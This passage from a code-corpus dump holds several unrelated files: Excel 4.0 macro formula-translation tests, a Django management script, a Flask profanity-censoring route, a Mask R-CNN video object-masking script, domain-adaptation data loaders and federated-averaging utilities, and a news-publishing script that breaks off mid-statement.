goto = Excel4GoToFormula(1,1,"GOTO", Excel4FormulaArgument("GOTO")) val = "GOTO()" self.assertEqual(str(goto._parse_args()), val, "Should be: " + val) val = "PRZEJDŹ.DO()" self.assertEqual(str(goto._parse_args("pl_PL")), val, "Should be: "+val) # Variable goto = Excel4GoToFormula(1, 1, "GOTO", Excel4Variable(1,2,"NAME","VALUE")) val = "R2C1" self.assertEqual(str(goto._parse_args()), val, "Should be: " + val) val = "W2K1" self.assertEqual(str(goto._parse_args("pl_PL")), val, "Should be: " + val) # Cell goto = Excel4GoToFormula(1, 1, "GOTO", Excel4Formula(1,2,"GOTO")) val = "R2C1" self.assertEqual(str(goto._parse_args()), val, "Should be: " + val) val = "W2K1" self.assertEqual(str(goto._parse_args("pl_PL")), val, "Should be: " + val) ``` #### File: boobsnail/tests/test_excel4_variable.py ```python from unittest import TestCase from excel4lib.macro import * class TestExcel4Variable(TestCase): def test_get_address(self): var = Excel4Variable(1,1, "name", "value") c = "{}".format(var.get_address("pl_PL")) self.assertEqual(c, "W1K1", "Shuold be W1K1") c = "{}".format(var.get_address("en_US")) self.assertEqual(c, "R1C1", "Shuold be R1C1") def test_get_reference(self): var = Excel4Variable(1,1, 
"name", "value") c = "{}".format(var.get_reference("pl_PL")) self.assertEqual(c, "name", "Should be name") def test__get_value(self): # String as value var = Excel4Variable(1,1, "name", "value") val = var._get_value("pl_PL") self.assertEqual(val, '"value"', 'Shuold be "value"') # Numeric value var = Excel4Variable(1,1, "name", 12121) val = var._get_value("pl_PL") self.assertEqual(val, "12121", "Shuold be 12121") # Cell as value var = Excel4Variable(1,1, "name", Excel4Formula(1,2,"GOTO")) val = var._get_value("pl_PL") self.assertEqual(val, "W2K1", "Shuold be W2K1") val = var._get_value() self.assertEqual(val, "R2C1", "Shuold be R2C1") # Excel4FormulaArgument as value var = Excel4Variable(1,1, "name", Excel4FormulaArgument("GOTO")) val = var._get_value("pl_PL") self.assertEqual(val, "PRZEJDŹ.DO()", "Shuold be PRZEJDŹ.DO()") val = var._get_value() self.assertEqual(val, "GOTO()", "Shuold be GOTO()") def test__get_variable(self): var = Excel4Variable(1,1, "name", "value") val = var._get_variable() self.assertEqual(val, 'name="value"', 'Shuold be name="value"') ```
{ "source": "AAADevs/PyLudus", "score": 3 }
#### File: AAADevs/PyLudus/manage.py ```python import os import sys from typing import List import django from django.contrib.auth import get_user_model from django.core.management import call_command, execute_from_command_line DEFAULT_ENVS = { "DJANGO_SETTINGS_MODULE": "PyLudus.settings", "SUPER_USERNAME": "admin", "SUPER_PASSWORD": "<PASSWORD>", } for key, value in DEFAULT_ENVS.items(): os.environ.setdefault(key, value) class SiteManager: """ Manages the preparation and serving of the website. Handles both development and production environments. Usage: manage.py run [option]... Options: --debug Runs a development server with debug mode enabled. --silent Sets minimal console output. --verbose Sets verbose console output. """ def __init__(self, args: List[str]): self.debug = "--debug" in args self.silent = "--silent" in args if self.silent: self.verbosity = 0 else: self.verbosity = 2 if "--verbose" in args else 1 if self.debug: os.environ.setdefault("DEBUG", "true") print("Starting in debug mode.") @staticmethod def create_superuser() -> None: """Create a default django admin super user in development environments.""" print("Creating a superuser.") name = os.environ["SUPER_USERNAME"] password = os.environ["SUPER_PASSWORD"] user = get_user_model() # Get or create admin superuser. if user.objects.filter(username=name).exists(): user = user.objects.get(username=name) print("Admin superuser already exists.") else: user = user.objects.create_superuser(name, "", password) print("Admin superuser created.") def prepare_server(self) -> None: """Perform preparation tasks before running the server.""" django.setup() print("Making migrations.") call_command("makemigrations", verbosity=self.verbosity) print("Applying migrations.") call_command("migrate", verbosity=self.verbosity) print("Collecting static files.") call_command( "collectstatic", interactive=False, clear=True, verbosity=self.verbosity ) if self.debug: self.create_superuser() def run_server(self) -> None: """Prepare and run the web server.""" in_reloader = os.environ.get("RUN_MAIN") == "true" # Prevent preparing twice when in dev mode due to reloader if not self.debug or in_reloader: self.prepare_server() print("Starting server.") # Run the development server call_command("runserver", "0.0.0.0:8000") def main() -> None: """Entry point for Django management script.""" # Use the custom site manager for launching the server if sys.argv[1] == "run": SiteManager(sys.argv).run_server() # Pass any others directly to standard management commands else: execute_from_command_line(sys.argv) if __name__ == "__main__": main() ```
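manage.py above seeds `DJANGO_SETTINGS_MODULE` and the superuser credentials through `os.environ.setdefault`, so anything exported before launch wins over `DEFAULT_ENVS`. A small sketch of that behaviour follows; the override value is illustrative.

```python
# Sketch of the environment-default pattern used in manage.py above:
# os.environ.setdefault only fills in a value when the variable is not already
# set, so variables exported before launch override DEFAULT_ENVS.
import os

DEFAULT_ENVS = {
    "DJANGO_SETTINGS_MODULE": "PyLudus.settings",
    "SUPER_USERNAME": "admin",
}

os.environ["SUPER_USERNAME"] = "deploy-admin"  # pretend the operator exported this

for key, value in DEFAULT_ENVS.items():
    os.environ.setdefault(key, value)

print(os.environ["SUPER_USERNAME"])          # deploy-admin (existing value kept)
print(os.environ["DJANGO_SETTINGS_MODULE"])  # PyLudus.settings (default applied)
```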
{ "source": "aa-ag/pg13", "score": 3 }
#### File: pg13/webapp/routes.py
```python
from webapp import app
from flask import render_template, redirect, url_for, request, jsonify, make_response
from better_profanity import profanity


@app.route('/about')
def about():
    return render_template("about.html")


@app.route('/')
def home():
    return render_template("home.html")


@app.route('/result', methods=["POST"])
def result():
    req = request.get_json()
    # print(req)
    as_string = req['input']
    checked = "Yes" if profanity.contains_profanity(as_string) == True else "No"
    # print(checked)
    censored = profanity.censor(as_string, '🙉')
    count = censored.count('🙉🙉🙉🙉')
    # print(censored)
    res = make_response(jsonify(f'Contains profanity? {checked}. Profanity count: {count}. Censored version: "{censored}"'), 200)
    # custom = []
    # profanity.add_censor_words(custom)
    return res
    return render_template("home.html")
```
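The `/result` route above leans on three `better_profanity` calls: `contains_profanity`, `censor`, and (commented out) `add_censor_words`. The standalone sketch below mirrors that flow with an illustrative input string; counting runs of four censor characters assumes the library replaces each flagged word with four copies of the censor character, which is also what the route's count of '🙉🙉🙉🙉' relies on.

```python
# Standalone sketch of the better_profanity calls used by the /result route above.
from better_profanity import profanity

text = "some example sentence"                 # illustrative input
flagged = profanity.contains_profanity(text)   # True / False
censored = profanity.censor(text, '*')         # flagged words become '****'
count = censored.count('****')                 # mirrors the route's emoji counting

print(flagged, count, censored)
```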
{ "source": "aaahmedms/Driver-Assist-Machine-Learning-With-RCNN-Mask", "score": 3 }
#### File: aaahmedms/Driver-Assist-Machine-Learning-With-RCNN-Mask/DAML_RCNN_Mask.py ```python import cv2 import numpy as np import os import sys from soco import coco from mrcnn import utils from mrcnn import model as modellib # This portion of the code is specifying the path to the appropiate directories, while also grabbing the weights for the pre-trained model. # The mask_rcnn_coco.h5 file is a pre-trained dataset provided by matterport that act as weights for MS COCO. It is mask-RCNN trained # for object detection. dirMain = os.path.abspath("./") dirModel = os.path.join(dirMain, "logs") sys.path.append(os.path.join(dirMain,"/coco/")) path_Coco = os.path.join(dirMain, "mrcnn/mask_rcnn_coco.h5") # A configuration object is required to make an inference for the Mask_RCNN instance # The configuration is set to specify the number of images per batch class Configure_coco(coco.CocoConfig): # Since we are running inference 1 image at a time, batch size is set to 1. Batch size = GPU_COUNT * IMAGES_PER_GPU GPU_COUNT = 1 IMAGES_PER_GPU = 1 # Creating an object of class Configure_coco to configure the masking model nConfig = Configure_coco() nConfig.display() # MaskRCNN instance object created in inference mode since this mode is used to make estimations for a given image, the dirModel variable is the # path to where the log messages will be stored mrcnn_model = modellib.MaskRCNN( mode="inference", model_dir=dirModel, config=nConfig ) # Load the weights that will be used to calculate the estimations, and assist in classifying the detected object in the frame mrcnn_model.load_weights(path_Coco, by_name=True) # Classification types to compare to for the given trained model class_names = [ 'BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train', 'truck', 'boat', 'traffic light', 'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat', 'baseball glove', 'skateboard', 'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote', 'keyboard', 'cell phone', 'microwave', 'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors', 'teddy bear', 'hair drier', 'toothbrush' ] # This function applies a cyan coloured mask with a 50% opacity to the ROI detected in the source image def apply_mask(cyan_col, mask, source, transp=0.5): for n, c in enumerate(cyan_col): source[:, :, n] = np.where( mask == 1, source[:, :, n] * (1 - transp) + transp * c, source[:, :, n] ) return source # Apply the mask, bounding box, and classification to the region of interest def mask_frame(source, region_interest, masks, class_ids, cls_names, scores): # Number of instances found in ROI n_instances = region_interest.shape[0] if not n_instances: print('NO Instances FOUND in ROI') else: assert region_interest.shape[0] == masks.shape[-1] == class_ids.shape[0] # For each instance found apply mask, box, and label for i in range(n_instances): # Detect only road obstacles from the class names specified in the class_names array above. class_names[1 .. 
14] if class_ids[i] in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]: if not np.any(region_interest[i]): continue # Coordinates for region of interest y1, x1, y2, x2 = region_interest[i] # Classification for the ROI label = class_names[class_ids[i]] # Confidence score in relation to its classification score = scores[i] if scores is not None else None # Store classification and score as a string caption to the object detected to be used as a label caption = '{} {:.2f}'.format(label, score) if score else label mask = masks[:, :, i] # Cyan color for mask / bounding box / label in BGR cyan_col = (240,252,3) # Apply the mask on the detected object source = apply_mask(cyan_col, mask, source) # Draw bounding box using the x/y coordinates from the roi on the detected object source = cv2.rectangle(source, (x1, y1), (x2, y2), cyan_col, 1) # Write the label classification above the detected object using the x/y coordinates source = cv2.putText( source, caption, (x1, y1), cv2.FONT_HERSHEY_COMPLEX, 0.7, cyan_col, 1 ) return source # Pre-Captured Video Source: stream = cv2.VideoCapture("VideoSourceFile/Freewaytest.mp4") # get original video size width = stream.get(cv2.CAP_PROP_FRAME_WIDTH) # float value, converted to integer in the next line when writing height = stream.get(cv2.CAP_PROP_FRAME_HEIGHT) # float value, converted to integer in the next line when writing # Create VideoWriter object # 0x7634706d is the (*'MP4V') video writing formatting, with an output resolution of the original size. video_output = cv2.VideoWriter('OutputVideo/output.mp4', 0x7634706d, 60.0, (int(width),int(height))) # Start capturing footage frame by frame and apply mask while True: # read in the stream wether its live camera feed or a video footage is_streaming , frame = stream.read() if not is_streaming: print("Finished stream, ending program") break #Make a prediction with the model creating a dictionary with a set of key value pairs that list possible objects detected get_frame_results = mrcnn_model.detect([frame], verbose=1) # Apply the bounding boxes, mask and classification to the footage after setting up the dictionary of key value pairs # Following keypoints in the dictionary # rois: Bounding boxes / regions of interest (ROI) for objects detected # masks: Masks to generate for objects detected # class_ids: Reference to the classification types # scores: Confidence score in relation to its classification to determine what it is detected_frame = get_frame_results[0] masked_image = mask_frame(frame, detected_frame['rois'], detected_frame['masks'], detected_frame['class_ids'], class_names, detected_frame['scores']) # Write to the video output video_output.write(masked_image) cv2.imshow("Driver Assist Machine Learning RCNN Mask",masked_image) # Press 'q' to exit the program early, the output video file will still be generated if terminated early if(cv2.waitKey(1) & 0xFF == ord('q')): break # Release Stream and video writing stream.release() video_output.release() cv2.destroyWindow("Driver Assist Machine Learning RCNN Mask") ```
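`apply_mask` in the script above blends the overlay colour into the frame channel by channel with `np.where`. A toy numpy example of that 50% blend, using the same cyan BGR colour, is sketched below; the 2×2 image and mask are made up for illustration.

```python
# Tiny numpy illustration of the per-channel alpha blend performed by apply_mask()
# above: inside the mask a pixel becomes 0.5 * original + 0.5 * overlay colour,
# outside the mask it is left untouched.
import numpy as np

cyan_col = (240, 252, 3)            # BGR overlay colour used in the script
transp = 0.5

source = np.full((2, 2, 3), 100.0)  # toy 2x2 "image"
mask = np.array([[1, 0],
                 [0, 0]])           # only the top-left pixel is masked

for n, c in enumerate(cyan_col):
    source[:, :, n] = np.where(mask == 1,
                               source[:, :, n] * (1 - transp) + transp * c,
                               source[:, :, n])

print(source[0, 0])  # blended pixel: [170.  176.   51.5]
print(source[1, 1])  # untouched pixel: [100. 100. 100.]
```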
{ "source": "AAAI2021-255/DFDA", "score": 2 }
#### File: DFDA/datasets/AmazonReview.py ```python import numpy as np import time import pickle from scipy.sparse import coo_matrix import torch.utils.data as data from PIL import Image import numpy as np from scipy.io import loadmat from os import path import torchvision.transforms as transforms from torch.utils.data import DataLoader class AmazonReviewDataset(data.Dataset): def __init__(self, data, labels): self.data = data self.labels = labels def __getitem__(self, index): tensor, label = np.squeeze(np.asarray(self.data[index])), self.labels[index] return tensor, label def __len__(self): return len(self.data) def load_amazon(base_path): dimension = 5000 amazon = np.load(path.join(base_path, "dataset", "AmazonReview", "amazon.npz")) amazon_xx = coo_matrix((amazon['xx_data'], (amazon['xx_col'], amazon['xx_row'])), shape=amazon['xx_shape'][::-1]).tocsc() amazon_xx = amazon_xx[:, :dimension] amazon_yy = amazon['yy'] amazon_yy = (amazon_yy + 1) / 2 amazon_offset = amazon['offset'].flatten() # Partition the data into four categories and for each category partition the data set into training and test set. data_name = ["books", "dvd", "electronics", "kitchen"] num_data_sets = 4 data_insts, data_labels, num_insts = [], [], [] for i in range(num_data_sets): data_insts.append(amazon_xx[amazon_offset[i]: amazon_offset[i + 1], :]) data_labels.append(amazon_yy[amazon_offset[i]: amazon_offset[i + 1], :]) num_insts.append(amazon_offset[i + 1] - amazon_offset[i]) # Randomly shuffle. r_order = np.arange(num_insts[i]) np.random.shuffle(r_order) data_insts[i] = data_insts[i][r_order, :] data_labels[i] = data_labels[i][r_order, :] data_insts[i] = data_insts[i].todense().astype(np.float32) data_labels[i] = data_labels[i].ravel().astype(np.int64) return data_insts, data_labels def amazon_dataset_read(base_path, domain, batch_size): data_insts, data_labels = load_amazon(base_path) if domain == "books": train_image, train_label, test_image, test_label = data_insts[0][:2000], data_labels[0][:2000], data_insts[0][ 2000:], \ data_labels[0][2000:] elif domain == "dvd": train_image, train_label, test_image, test_label = data_insts[1][:2000], data_labels[1][:2000], data_insts[1][ 2000:], \ data_labels[1][2000:] elif domain == "electronics": train_image, train_label, test_image, test_label = data_insts[2][:2000], data_labels[2][:2000], data_insts[2][ 2000:], \ data_labels[2][2000:] elif domain == "kitchen": train_image, train_label, test_image, test_label = data_insts[3][:2000], data_labels[3][:2000], data_insts[3][ 2000:], \ data_labels[3][2000:] else: raise NotImplementedError("Domain {} Not Implemented".format(domain)) # raise train and test data loader train_dataset = AmazonReviewDataset(data=train_image, labels=train_label) train_loader = DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True, num_workers=4) test_dataset = AmazonReviewDataset(data=test_image, labels=test_label) test_loader = DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=True, num_workers=4) return train_loader, test_loader ``` #### File: DFDA/lib/dataloader.py ```python from torchvision import transforms, datasets from torch.utils.data import DataLoader from torch.utils.data.sampler import SubsetRandomSampler import torch cifar10_label_map = {0: 0, 1: 2, 2: 1, 3: 3, 4: 4, 5: 5, 6: 1000, 7: 6, 8: 8, 9: 9} def cifar10_label_transform(label): return cifar10_label_map[label] def stl10_dataset(dataset_base_path, train_flag=True): transform = transforms.Compose([ transforms.Resize(128), transforms.ToTensor() ]) if 
train_flag: transform = transforms.Compose([ transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transform ]) if train_flag: split = "train" else: split = "test" dataset = datasets.STL10(root=dataset_base_path, transform=transform, split=split) return dataset def cifar10_dataset(dataset_base_path, train_flag=True, target_domain=False): if target_domain: target_transform = cifar10_label_transform else: target_transform = None transform = transforms.Compose([ transforms.ToTensor(), transforms.Normalize(mean=(0.4914, 0.4822, 0.4465), std=(0.2023, 0.1994, 0.2010)) ]) if train_flag: transform = transforms.Compose([ transforms.Pad(4, padding_mode='reflect'), transforms.RandomHorizontalFlip(), transforms.RandomCrop(32), transform ]) dataset = datasets.CIFAR10(root=dataset_base_path, train=train_flag, download=False, transform=transform,target_transform=target_transform) return dataset def cifar100_dataset(dataset_base_path, train_flag=True): transform = transforms.Compose([ transforms.ToTensor(), transforms.Normalize(mean=(0.5071, 0.4867, 0.4408), std=(0.2675, 0.2565, 0.2761)) ]) if train_flag: transform = transforms.Compose([ transforms.Pad(4, padding_mode='reflect'), transforms.RandomHorizontalFlip(), transforms.RandomCrop(32), transform ]) dataset = datasets.CIFAR100(root=dataset_base_path, train=train_flag, download=False, transform=transform) return dataset def svhn_dataset(dataset_base_path, train_flag=True): transform = transforms.Compose([ transforms.ToTensor(), transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5)) ]) if train_flag: transform = transforms.Compose([ transforms.Pad(4, padding_mode='reflect'), transforms.RandomHorizontalFlip(), transforms.RandomCrop(32), transform ]) if train_flag: dataset = datasets.SVHN(root=dataset_base_path, split='train', transform=transform, download=True) else: dataset = datasets.SVHN(root=dataset_base_path, split='test', transform=transform, download=True) return dataset def get_ssl_sampler(labels, valid_num_per_class, annotated_num_per_class, num_classes): """ :param labels: torch.array(int tensor) :param valid_num_per_class: the number of validation for each class :param annotated_num_per_class: the number of annotation we use for each classes :param num_classes: the total number of classes :return: sampler_l,sampler_u """ sampler_valid = [] sampler_train_l = [] sampler_train_u = [] for i in range(num_classes): loc = torch.nonzero(labels == i) loc = loc.view(-1) # do random perm to make sure uniform sample loc = loc[torch.randperm(loc.size(0))] sampler_valid.extend(loc[:valid_num_per_class].tolist()) sampler_train_l.extend(loc[valid_num_per_class:valid_num_per_class + annotated_num_per_class].tolist()) # sampler_train_u.extend(loc[num_valid + annotated_num_per_class:].tolist()) # here the unsampled part also include the train_l part sampler_train_u.extend(loc[valid_num_per_class:].tolist()) sampler_valid = SubsetRandomSampler(sampler_valid) sampler_train_l = SubsetRandomSampler(sampler_train_l) sampler_train_u = SubsetRandomSampler(sampler_train_u) return sampler_valid, sampler_train_l, sampler_train_u def get_sl_sampler(labels, valid_num_per_class, num_classes): """ :param labels: torch.array(int tensor) :param valid_num_per_class: the number of validation for each class :param num_classes: the total number of classes :return: sampler_l,sampler_u """ sampler_valid = [] sampler_train = [] for i in range(num_classes): loc = torch.nonzero(labels == i) loc = loc.view(-1) # do random perm to make sure uniform sample loc = 
loc[torch.randperm(loc.size(0))] sampler_valid.extend(loc[:valid_num_per_class].tolist()) sampler_train.extend(loc[valid_num_per_class:].tolist()) sampler_valid = SubsetRandomSampler(sampler_valid) sampler_train = SubsetRandomSampler(sampler_train) return sampler_valid, sampler_train if __name__ == "__main__": from glob import glob from torch.utils.data import DataLoader ``` #### File: lib/utils/federated_utils.py ```python from itertools import permutations, combinations import torch def create_domain_weight(source_domain_num): global_federated_matrix = [1 / (source_domain_num + 1)] * (source_domain_num + 1) return global_federated_matrix def update_domain_weight(global_domain_weight, epoch_domain_weight, momentum=0.9): global_domain_weight = [round(global_domain_weight[i] * momentum + epoch_domain_weight[i] * (1 - momentum), 4) for i in range(len(epoch_domain_weight))] return global_domain_weight def federated_average(model_list, coefficient_matrix, batchnorm_mmd=True): """ :param model_list: a list of all models needed in federated average. [0]: model for target domain, [1:-1] model for source domains :param coefficient_matrix: the coefficient for each model in federate average, list or 1-d np.array :param batchnorm_mmd: bool, if true, we use the batchnorm mmd :return model list after federated average """ if batchnorm_mmd: dict_list = [it.state_dict() for it in model_list] dict_item_list = [dic.items() for dic in dict_list] for key_data_pair_list in zip(*dict_item_list): source_data_list = [pair[1] * coefficient_matrix[idx] for idx, pair in enumerate(key_data_pair_list)] dict_list[0][key_data_pair_list[0][0]] = sum(source_data_list) for model in model_list: model.load_state_dict(dict_list[0]) else: named_parameter_list = [model.named_parameters() for model in model_list] for parameter_list in zip(*named_parameter_list): source_parameters = [parameter[1].data.clone() * coefficient_matrix[idx] for idx, parameter in enumerate(parameter_list)] parameter_list[0][1].data = sum(source_parameters) for parameter in parameter_list[1:]: parameter[1].data = parameter_list[0][1].data.clone() def knowledge_vote(knowledge_list, confidence_gate, num_classes): """ :param torch.tensor knowledge_list : recording the knowledge from each source domain model :param float confidence_gate: the confidence gate to judge which sample to use :return: consensus_confidence,consensus_knowledge,consensus_knowledge_weight """ max_p, max_p_class = knowledge_list.max(2) max_conf, _ = max_p.max(1) max_p_mask = (max_p > confidence_gate).float().cuda() consensus_knowledge = torch.zeros(knowledge_list.size(0), knowledge_list.size(2)).cuda() for batch_idx, (p, p_class, p_mask) in enumerate(zip(max_p, max_p_class, max_p_mask)): # to solve the [0,0,0] situation if torch.sum(p_mask) > 0: p = p * p_mask for source_idx, source_class in enumerate(p_class): consensus_knowledge[batch_idx, source_class] += p[source_idx] consensus_knowledge_conf, consensus_knowledge = consensus_knowledge.max(1) consensus_knowledge_mask = (max_conf > confidence_gate).float().cuda() consensus_knowledge = torch.zeros(consensus_knowledge.size(0), num_classes).cuda().scatter_(1, consensus_knowledge.view( -1, 1), 1) return consensus_knowledge_conf, consensus_knowledge, consensus_knowledge_mask def calculate_consensus_focus(consensus_focus_dict, knowledge_list, confidence_gate, source_domain_numbers, num_classes): """ :param consensus_focus_dict: record consensus_focus for each domain :param torch.tensor knowledge_list : recording the knowledge from each 
    source domain model
    :param float confidence_gate: the confidence gate to judge which sample to use
    :param source_domain_numbers: the numbers of source domains
    :param num_classes: the total number of classes
    """
    domain_contribution = {frozenset(): 0}
    for combination_num in range(1, source_domain_numbers + 1):
        combination_list = list(combinations(range(source_domain_numbers), combination_num))
        for combination in combination_list:
            consensus_knowledge_conf, consensus_knowledge, consensus_knowledge_mask = knowledge_vote(
                knowledge_list[:, combination, :], confidence_gate, num_classes)
            domain_contribution[frozenset(combination)] = torch.sum(
                consensus_knowledge_conf * consensus_knowledge_mask).item()
    permutation_list = list(permutations(range(source_domain_numbers), source_domain_numbers))
    permutation_num = len(permutation_list)
    for permutation in permutation_list:
        permutation = list(permutation)
        for source_idx in range(source_domain_numbers):
            consensus_focus_dict[source_idx + 1] += (
                domain_contribution[frozenset(permutation[:permutation.index(source_idx) + 1])]
                - domain_contribution[frozenset(permutation[:permutation.index(source_idx)])]
            ) / permutation_num
    return consensus_focus_dict


def decentralized_training_strategy(communication_rounds, epoch_samples, batch_size, total_epochs):
    """
    Split one epoch into r rounds and perform model aggregation
    :param communication_rounds: the communication rounds in training process
    :param epoch_samples: the samples for each epoch
    :param batch_size: the batch_size for each epoch
    :param total_epochs: the total epochs for training
    :return: batch_per_epoch, total_epochs with communication rounds r
    """
    if communication_rounds >= 1:
        epoch_samples = round(epoch_samples / communication_rounds)
        total_epochs = round(total_epochs * communication_rounds)
        batch_per_epoch = round(epoch_samples / batch_size)
    elif communication_rounds in [0.2, 0.5]:
        total_epochs = round(total_epochs * communication_rounds)
        batch_per_epoch = round(epoch_samples / batch_size)
    else:
        raise NotImplementedError(
            "The communication round {} is illegal; it should be >= 1, 0.2, or 0.5".format(communication_rounds))
    return batch_per_epoch, total_epochs
```
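For orientation, the sketch below shows one way the helpers above could be wired together in a training run. It is a minimal, hypothetical example rather than code from this repository: the `nn.Linear` "models", the sample/batch counts, and the uniform per-epoch weights are placeholders, it assumes the functions above are importable (e.g. `from lib.utils.federated_utils import *`), and `knowledge_vote` / `calculate_consensus_focus` are only referenced in comments because they allocate CUDA tensors internally.

```python
import torch.nn as nn

num_sources, num_classes = 3, 10

# models[0] is the target-domain model, models[1:] are the source-domain models,
# matching the ordering documented in federated_average above.
models = [nn.Linear(32, num_classes) for _ in range(num_sources + 1)]

# Uniform initial aggregation weights of length num_sources + 1.
weights = create_domain_weight(num_sources)

# With communication_rounds=1 this just converts epoch_samples into batches per epoch.
batch_per_epoch, total_epochs = decentralized_training_strategy(
    communication_rounds=1, epoch_samples=50000, batch_size=128, total_epochs=2)

for epoch in range(total_epochs):
    # ... locally train each source model for batch_per_epoch batches here ...
    # For pseudo-labelling the target domain one would stack the source models'
    # softmax outputs into a (batch, num_sources, num_classes) tensor and call
    # knowledge_vote(knowledge_list, confidence_gate=0.9, num_classes=num_classes).

    # Aggregate parameters (and BatchNorm statistics when batchnorm_mmd=True) into
    # a single averaged state dict, then broadcast it back to every model in the list.
    federated_average(models, weights, batchnorm_mmd=True)

    # A data-driven epoch weight (e.g. derived from calculate_consensus_focus) would
    # normally go here; a uniform vector is used purely as a placeholder.
    weights = update_domain_weight(weights, create_domain_weight(num_sources))
```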
{ "source": "AAAI/AINews", "score": 2 }
#### File: AAAI/AINews/AINewsPublisher.py ```python import feedparser import sys import operator import re import urllib2 from lxml import etree from os import path, mkdir, remove from glob import glob from random import shuffle from subprocess import * from datetime import date, datetime, timedelta from AINewsTools import savefile from AINewsConfig import config, paths, blacklist_urls from AINewsDB import AINewsDB from AINewsCorpus import AINewsCorpus from AINewsDuplicates import AINewsDuplicates from AINewsTextProcessor import AINewsTextProcessor from AINewsSummarizer import AINewsSummarizer from AINewsWekaClassifier import AINewsWekaClassifier sys.path.append(paths['templates.compiled']) from FeedImport import FeedImport from LatestNewsEmail import LatestNewsEmail class AINewsPublisher(): def __init__(self): self.debug = config['ainews.debug'] self.today = date.today() self.earliest_date = self.today - timedelta(days = int(config['ainews.period'])) self.db = AINewsDB() self.corpus = AINewsCorpus() self.duplicates = AINewsDuplicates() self.txtpro = AINewsTextProcessor() self.weka = AINewsWekaClassifier() self.articles = {} self.semiauto_email_output = "" def filter_and_process(self): self.articles = self.corpus.get_unprocessed() if len(self.articles) == 0: return # assume every article will be published; may be set to False from one # of the filtering processes below for urlid in self.articles: self.articles[urlid]['publish'] = True self.articles[urlid]['transcript'] = [] # filter by date print "Filtering by date..." for urlid in self.articles: if self.articles[urlid]['pubdate'] == None: # give a meaningful pubdate so that other code doesn't crash self.articles[urlid]['pubdate'] = self.today self.articles[urlid]['publish'] = False self.articles[urlid]['transcript'].append("Rejected due to bogus publication date.") elif self.articles[urlid]['pubdate'] < self.earliest_date: self.articles[urlid]['publish'] = False self.articles[urlid]['transcript'].append( ("Rejected because article is too old " + "(earliest valid date is %s while article was " + "published on %s") % (self.earliest_date.strftime('%F'), self.articles[urlid]['pubdate'].strftime('%F'))) # filter by blacklist (for urls) print "Filtering by blacklist..." for urlid in self.articles: for black in blacklist_urls: if re.search(black, self.articles[urlid]['url']): self.articles[urlid]['publish'] = False self.articles[urlid]['transcript'].append( ("Rejected because url matched blacklisted url %s" % black)) break # filter by whitelist print "Filtering by whitelist..." for urlid in self.articles: white_wordfreq = self.txtpro.whiteprocess(urlid, self.articles[urlid]['content']) self.articles[urlid]['white_wordfreq'] = white_wordfreq # require at least two different whitelisted terms # unless the article is user-submitted if len(white_wordfreq) < 2 \ and self.articles[urlid]['source'] != 'User Submitted': self.articles[urlid]['publish'] = False self.articles[urlid]['transcript'].append( 'Rejected due to only one or no whitelisted terms') # update categories based on classifier predictions print "Classifying..." self.weka.predict(self.articles) # drop articles with no categories print "Dropping articles with no categories..." 
for urlid in self.articles: if len(self.articles[urlid]['categories']) == 0: self.articles[urlid]['publish'] = False self.articles[urlid]['transcript'].append( 'Rejected due to no selected categories') # filter out duplicates; some articles may have 'publish' set to False # by this function print "Filtering duplicates..." self.duplicates.filter_duplicates(self.articles) for urlid in self.articles: print urlid, self.articles[urlid]['publish'], \ self.articles[urlid]['title'], \ self.articles[urlid]['categories'], \ self.articles[urlid]['summary'] print print "Grabbing images..." for urlid in self.articles: # grab and convert article image (if it exists) self.grab_convert_image(self.articles[urlid]) # update article in database self.update_db(self.articles[urlid]) # mark each as processed print "Marking as processed." self.corpus.mark_processed(self.articles.itervalues()) def grab_convert_image(self, article): if len(article['image_url']) == 0: article['image_path'] = '' return try: f = urllib2.urlopen(article['image_url']) img = open("%s%s" % (paths['ainews.image_dir'], str(article['urlid'])), 'w') img.write(f.read()) img.close() # produces [urlid].jpg Popen("%s -format jpg -gravity Center -thumbnail 200x200 %s%s" % \ (paths['imagemagick.mogrify'], paths['ainews.image_dir'], str(article['urlid'])), shell = True).communicate() # remove [urlid] file (with no extension) remove("%s%s" % (paths['ainews.image_dir'], str(article['urlid']))) article['image_path'] = "public://newsfinder_images/%s.jpg" % article['urlid'] except Exception as e: print "Failed converting image for %d: %s" % (article['urlid'], e) article['image_path'] = '' def update_db(self, article): self.db.execute("delete from categories where urlid = %s", article['urlid']) for cat in article['categories']: self.db.execute("insert into categories values (%s,%s)", (article['urlid'], cat)) def generate_feed_import(self): """ Generate XML file for feed import on the Drupal site. """ xml = FeedImport() for article in self.articles.values(): article['source'] = re.sub(r'&', '&amp;', article['source']) xml.news = self.articles.values() savefile(paths['ainews.output_xml'] + "news.xml", str(xml)) def generate_email_output(self): articles = [] try: f = urllib2.urlopen(paths['ainews.top_weekly_news_xml']) xml = etree.parse(f) for node in xml.iter("node"): print "Found", node.findtext("Title") published = node.findtext("Publication_date") articles.append({'title': node.findtext("Title"), 'source': node.findtext("Source"), 'topics': re.sub(r'/topic/', 'http://aitopics.org/topic/', node.findtext("Topics")), 'pubdate': date(int(published[0:4]), int(published[5:7]), int(published[8:10])), 'summary': re.sub(r'</p>(</blockquote>)?$', '', re.sub(r'^(<blockquote>)?<p>', '', node.findtext("Body"))), 'url': node.findtext("Original_link"), 'link': re.sub(r'/news/', 'http://aitopics.org/news/', node.findtext("Link")), 'image': re.sub(r'<img', '<img align="left" style="margin: 8px 8px 8px 0; border: 1px solid #ccc; padding: 5px; background: white;" ', node.findtext("Representative_image"))}) except Exception, e: print e email = LatestNewsEmail() email.date = self.today.strftime("%B %d, %Y") email.year = self.today.strftime("%Y") email.articles = articles email_output = 